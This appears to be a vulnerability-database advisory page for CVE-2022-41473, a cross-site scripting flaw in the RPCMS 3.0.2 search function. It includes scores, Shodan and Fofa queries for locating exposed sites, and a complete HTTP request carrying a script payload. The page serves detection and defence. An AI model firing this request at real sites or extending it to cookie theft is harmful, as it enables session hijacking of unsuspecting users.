🔙 목록으로 돌아가기

CVE-2022-41473: RPCMS 3.0.2 - Cross-Site Scripting

TitleRPCMS 3.0.2 - Cross-Site Scripting
Authorarafatansari
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the website.
RemediationApply the latest security patch or upgrade to a newer version of RPCMS to mitigate the XSS vulnerability.
CVSS Score6.1
EPSS Score0.07139
CVE IDCVE-2022-41473
CWE IDCWE-79
Shodan Queryhttp.html:"RPCMS"http.html:"rpcms"
Fofa Querybody="rpcms"
Tags cve cve2022 rpcms xss vuln

🔍 Vulnerability Description

RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

🌐 HTTP Request

GET /search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-41473.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-41473.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A